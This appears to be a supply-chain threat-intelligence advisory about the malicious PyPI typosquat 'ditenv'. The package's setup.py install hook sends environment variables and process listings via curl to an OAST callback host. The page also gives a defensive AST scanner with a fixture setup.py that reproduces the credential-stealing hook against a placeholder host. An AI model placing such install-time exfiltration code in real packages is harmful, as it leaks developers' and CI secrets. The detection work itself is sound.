Supply-chain threat intelligence

Incident detail

critical · pypi · typosquatting · osv

Malicious code in ditenv (PyPI)

ditenv

Risk score

92

AI summary

Indexed incident for ditenv (pypi).

Description

setup.py overrides the install and egg_info commands with a RunCommand() class that fires unconditionally on pip install or pip download. The override reads the entire process environment via os.environ, serializes every key=value pair, captures the output of ps -elf, and POSTs the combined payload over plaintext HTTP via curl to a hardcoded interactsh/OAST subdomain (gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun). On developer machines and CI runners, the captured environment routinely contains AWS_SECRET_ACCESS_KEY, GH_TOKEN, NPM_TOKEN, PYPI_TOKEN, and similar credentials, all of which are leaked to an arbitrary attacker-controlled callback host. The package name is suggestive of a dotenv typosquat and the README self-identifies as a proof-of-concept; a comment claims the code is 'for research not for doing any harmful activity', but the cover story does not change the fact that any installer is subjected to live credential theft.
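One static check a registry scanner or a CI pre-install gate could run against a setup.py for exactly the pattern described above, as an added example that is not ThreatPkg's own code: parse the file with the standard `ast` module, find `cmdclass` overrides of install-time hooks passed to `setup()`, and flag those whose class body reads the environment, spawns processes or embeds a callback URL. The sample setup.py is a constructed fixture with a placeholder callback host; the hook list and marker sets are assumptions chosen for this example, not a published rule set.

```python
import ast

# setuptools hooks that run during pip install/download, plus markers worth reviewing.
HOOKED_COMMANDS = {"install", "egg_info", "develop", "build_py", "sdist", "bdist_wheel"}
SUSPICIOUS_ATTRS = {"environ", "getenv", "check_output", "Popen", "call", "urlopen"}
SUSPICIOUS_TOKENS = ("curl", "wget", "http://", "oast")

def cmdclass_entries(tree):
    """Yield (hook, class_name) for cmdclass={"hook": Cls} entries in setup() calls."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and getattr(node.func, "id", None) == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key, val in zip(kw.value.keys, kw.value.values):
                        if isinstance(key, ast.Constant) and isinstance(val, ast.Name):
                            yield key.value, val.id

def suspicious_markers(class_node):
    """Collect suspicious attribute accesses and string tokens inside a command class."""
    markers = set()
    for node in ast.walk(class_node):
        if isinstance(node, ast.Attribute) and node.attr in SUSPICIOUS_ATTRS:
            markers.add(node.attr)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            markers.update(tok for tok in SUSPICIOUS_TOKENS if tok in node.value)
    return markers

def scan_setup_py(source):
    """Return {hook: (class_name, sorted markers)} for overridden hooks that look exfiltrating."""
    tree = ast.parse(source)
    classes = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.ClassDef)}
    report = {}
    for hook, cls in cmdclass_entries(tree):
        if hook in HOOKED_COMMANDS and cls in classes and (m := suspicious_markers(classes[cls])):
            report[hook] = (cls, sorted(m))
    return report

# Constructed fixture mirroring the described setup.py; the callback host is a placeholder.
SAMPLE_SETUP_PY = """
import os, subprocess
from setuptools import setup
from setuptools.command.install import install
class RunCommand(install):
    def run(self):
        env = dict(os.environ)                            # reads the whole environment
        procs = subprocess.check_output(["ps", "-elf"])   # process listing
        subprocess.call(["curl", "http://callback.example.invalid"])  # placeholder host
        install.run(self)
setup(name="pkg", version="0.0.1", cmdclass={"install": RunCommand, "egg_info": RunCommand})
"""
```

Running `scan_setup_py(SAMPLE_SETUP_PY)` reports both the `install` and `egg_info` overrides with the environment read, the process spawn and the embedded URL as markers; a clean setup.py with no `cmdclass` yields an empty report.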

During installation, the package exfiltrates environment variables

Category: MALICIOUS - The campaign has clearly malicious intent, such as infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting

Technical details

Affected versions

= 0.0.1

Indicators

  • affected version = 0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents